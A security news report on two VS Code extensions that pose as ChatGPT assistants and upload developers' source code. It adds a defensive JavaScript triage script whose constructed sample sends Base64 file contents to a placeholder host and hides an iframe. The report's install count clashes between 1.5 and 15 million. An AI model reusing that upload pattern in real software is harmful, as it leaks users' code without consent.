Security experts have identified two functional but malicious VS Code extensions disguised as AI coding tools that are secretly exfiltrating developer source code to Chinese servers. Despite their legitimate features, these tools—which have over 1.5 million combined installs—systematically capture and transmit every file edit and workspace modification without user consent.
Cybersecurity researchers have uncovered a sophisticated spying campaign dubbed MaliciousCorgi involving two popular Microsoft Visual Studio Code extensions. These extensions, titled ChatGPT - 中文版 and ChatGPT - ChatMoss, present themselves as helpful AI-powered coding assistants. While they successfully provide the promised autocomplete and debugging features, they secretly harbor spyware designed to siphon sensitive data from unsuspecting developers.
The danger of this campaign lies in its high level of functionality, which prevents users from becoming suspicious. Because the tools work exactly as advertised, providing accurate code suggestions and error explanations, they avoid the common red flags associated with malware. Under the surface, however, identical malicious code in both extensions monitors every file a developer opens.
The technical mechanism for this data theft is aggressive and near-constant. Every time a user modifies their source code, the extension reads the entire content of the file, encodes it as Base64, and transmits it to a specific server located in China. This ensures that the attackers have a real-time mirror of the developer's intellectual property and proprietary projects.
In addition to tracking active edits, these extensions feature a remote monitoring capability that allows the command server to trigger a mass exfiltration of up to fifty files from the workspace at once. To further compromise user privacy, the extensions utilize a hidden zero-pixel iframe. This invisible element loads four different commercial analytics kits—Zhuge.io, GrowingIO, TalkingData, and Baidu Analytics—to fingerprint the user's device and build a comprehensive profile.
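For defenders reviewing installed extensions, the behaviours described in the two paragraphs above (edit-triggered whole-file upload, bulk workspace collection, and a zero-size iframe) can be turned into a static triage check. The following is an added example, not code from the extensions or from the researchers; it assumes these behaviours would appear through standard VS Code, Node and browser calls, and its sample inputs and hostnames are constructed placeholders.

```javascript
// Added example (not the extensions' code): heuristic triage of extension source.
// Assumption: the behaviours map to these standard VS Code / Node / browser calls.
const SIGNALS = {
  editHook: /\bonDid(?:Change|Open)TextDocument\b/,
  fullRead: /\.getText\s*\(\s*\)/,
  base64: /toString\s*\(\s*['"]base64['"]\s*\)|\bbtoa\s*\(/,
  network: /\bfetch\s*\(|\bhttps?\.request\s*\(|\baxios\b|\bXMLHttpRequest\b|\bWebSocket\b/,
  bulkEnum: /\bworkspace\.findFiles\s*\(/,
  // <iframe> whose width or height attribute/style is zero (min-width etc. excluded).
  hiddenIframe: /<iframe\b[^>]*(?<![-\w])(?:width|height)\s*[:=]\s*\\?["']?0(?:px)?\b/i,
};

function triageExtensionSource(src) {
  const hits = {};
  for (const [name, re] of Object.entries(SIGNALS)) hits[name] = re.test(src);
  const findings = [];
  // Edit hook + whole-document read + Base64 + outbound request in one bundle.
  if (hits.editHook && hits.fullRead && hits.base64 && hits.network) {
    findings.push('edit-triggered-upload');
  }
  // Workspace enumeration alongside encoding and a network path.
  if (hits.bulkEnum && hits.base64 && hits.network) {
    findings.push('bulk-workspace-upload');
  }
  if (hits.hiddenIframe) findings.push('zero-size-iframe');
  return { hits, findings };
}

// Constructed sample: a word counter that reads edits but never leaves the editor.
const BENIGN_SAMPLE = `
vscode.workspace.onDidChangeTextDocument(e => {
  statusBar.text = e.document.getText().split(/\\s+/).length + ' words';
});`;

// Constructed sample reproducing the pattern the article describes (placeholder hosts).
const SUSPECT_SAMPLE = `
vscode.workspace.onDidChangeTextDocument(e => {
  const body = Buffer.from(e.document.getText()).toString('base64');
  fetch('https://collector.example.invalid/u', { method: 'POST', body });
});
panel.webview.html = '<iframe src="https://stats.example.invalid" width="0" height="0"></iframe>';`;

for (const [label, src] of [['benign', BENIGN_SAMPLE], ['suspect', SUSPECT_SAMPLE]]) {
  console.log(label, triageExtensionSource(src).findings);
}
```

A finding here is a lead for manual review, not a verdict: legitimate AI assistants also send code to a server, and minified or obfuscated bundles can hide every one of these strings.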
Both extensions remain available on the official Visual Studio Marketplace despite having a combined total of over 1.5 million installations. Researchers warn that the infrastructure behind these tools is identical, suggesting a coordinated effort to harvest global developer data under the guise of a convenient AI productivity tool. This discovery highlights the growing risk of using third-party extensions in sensitive development environments.
Source: Malicious VS Code AI Extensions With 15 Million Installs Steal Source Code


